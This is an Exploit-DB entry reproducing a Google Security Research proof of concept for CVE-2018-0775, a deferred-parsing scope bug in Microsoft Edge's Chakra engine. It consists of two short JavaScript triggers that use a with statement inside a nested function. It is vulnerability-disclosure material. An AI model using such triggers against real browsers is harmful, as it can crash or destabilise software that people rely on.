- 18 Dec 2022
- EDB-ID: 43717
- EDB verification: Passed
- Author: GOOGLE SECURITY RESEARCH
- Vulnerability type: DOS
- Platform: WINDOWS
- CVE: CVE-2018-0775
- Publication date: 2018-01-17
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
Code:
/*
Since the PoC is only triggerable when the "DeferParse" flag is enabled and requires a with statement, I think this is similar to issue 1310.
PoC:
*/
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());` + '\n'.repeat(0x1000));

// PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());
- Source: www.exploit-db.com